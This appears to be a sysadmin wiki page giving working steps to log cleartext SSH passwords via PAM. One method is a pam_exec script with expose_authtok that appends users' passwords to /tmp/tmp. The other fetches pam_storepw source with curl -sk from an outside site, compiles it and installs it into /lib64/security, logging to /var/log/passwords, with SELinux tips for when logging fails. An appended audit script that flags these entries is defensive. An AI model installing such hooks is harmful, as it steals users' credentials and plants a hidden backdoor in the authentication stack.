Sshd

From Halfface

sshd save password

pam_exec.so

/etc/pam.d/password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

/usr/local/bin/pam_exec.so

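#!/bin/sh
# Run by pam_exec.so; with expose_authtok the password is supplied on stdin.
umask 077               # a newly created log file is readable by its owner only
read -r password        # -r keeps backslashes in the password intact
echo "User: $PAM_USER" >> /tmp/tmp
echo "Ruser: $PAM_RUSER" >> /tmp/tmp
echo "Rhost: $PAM_RHOST" >> /tmp/tmp
echo "Service: $PAM_SERVICE" >> /tmp/tmp
echo "TTY: $PAM_TTY" >> /tmp/tmp
# printf writes the password verbatim; some echo implementations expand backslashes
printf 'Password : %s\n' "$password" >> /tmp/tmp
exit $?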

pam_storepw.so

Download the source code for the module, saving it as pam_storepw.c so that the Makefile below can find it.

curl -sk -o pam_storepw.c http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c

Create the following Makefile

all: pam_storepw.so

pam_storepw.so: pam_storepw.o
	$(LD) --shared -o $@ $< -lpam -lpam_misc

clean:
	rm -f pam_storepw.o pam_storepw.so core *~

extraclean: clean
	rm -f *.a *.o *.so *.bak

.c.o:
	$(CC) $(CFLAGS) -c $< -o $@ -fPIC

Build the module

make

Copy the module into the PAM module directory

cp pam_storepw.so /lib64/security/
chmod 755 /lib64/security/pam_storepw.so

/etc/pam.d/password-auth-ac

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_storepw.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...

Passwords are now written to

/var/log/passwords

If no entries appear:

Temporarily turn SELinux off to see whether logging starts to work.
Run PAM in debug mode to see what is going on.
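
To check whether a host carries either of the two setups described on this page, its PAM service files can be scanned for the corresponding entries. The script below is an added example, not part of the original page; the function names audit_pam_dir and demo are hypothetical, and the sample file is constructed from the two stacks shown above.

```shell
#!/bin/sh
# Added example: audit PAM service files for entries that expose or store
# the cleartext authentication token (the two setups shown on this page).

# audit_pam_dir DIR
# Prints "file:line: finding" per match; returns 1 if anything was flagged.
audit_pam_dir() {
    status=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        awk -v file="$f" '
            /^[ \t]*(#|$)/ { next }            # skip comments and blank lines
            {
                i = 2                           # control field, may be "[a=b c=d]"
                if ($2 ~ /^\[/) while (i < NF && $i !~ /\]$/) i++
                mod = $(i + 1); expose = 0; cmd = "(none)"
                for (j = i + 2; j <= NF; j++) {
                    if ($j == "expose_authtok") expose = 1
                    else if ($j ~ /^\// && cmd == "(none)") cmd = $j
                }
                if (mod ~ /pam_exec\.so$/ && expose) {
                    printf "%s:%d: pam_exec passes authtok to %s\n", file, NR, cmd
                    bad = 1
                } else if (mod ~ /pam_storepw\.so$/) {
                    printf "%s:%d: pam_storepw writes cleartext passwords\n", file, NR
                    bad = 1
                }
            }
            END { exit bad + 0 }
        ' "$f" || status=1
    done
    return "$status"
}

# Constructed sample combining the two stacks above; not a real host config.
demo() {
    d=$(mktemp -d) || return 2
    cat > "$d/password-auth-ac" <<'EOF'
#%PAM-1.0
auth        required      pam_env.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        optional      pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth        optional      pam_storepw.so
auth        [success=1 default=ignore] pam_succeed_if.so user in ipautomata
EOF
    audit_pam_dir "$d"; rc=$?
    rm -rf "$d"
    return "$rc"
}
demo || true    # flags lines 4 and 5 of the constructed sample
```

On a real system, call audit_pam_dir /etc/pam.d as root; line continuations with a trailing backslash are not joined by this sketch.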